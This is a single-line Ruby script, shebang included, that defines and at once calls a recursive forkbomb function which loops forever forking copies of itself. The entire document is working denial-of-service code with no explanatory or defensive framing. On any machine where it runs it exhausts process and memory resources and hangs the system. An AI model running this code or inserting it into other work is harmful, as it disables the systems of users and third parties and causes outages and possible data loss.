#!/usr/local/bin/ruby def forkbomb loop { fork { forkbomb } } end forkbomb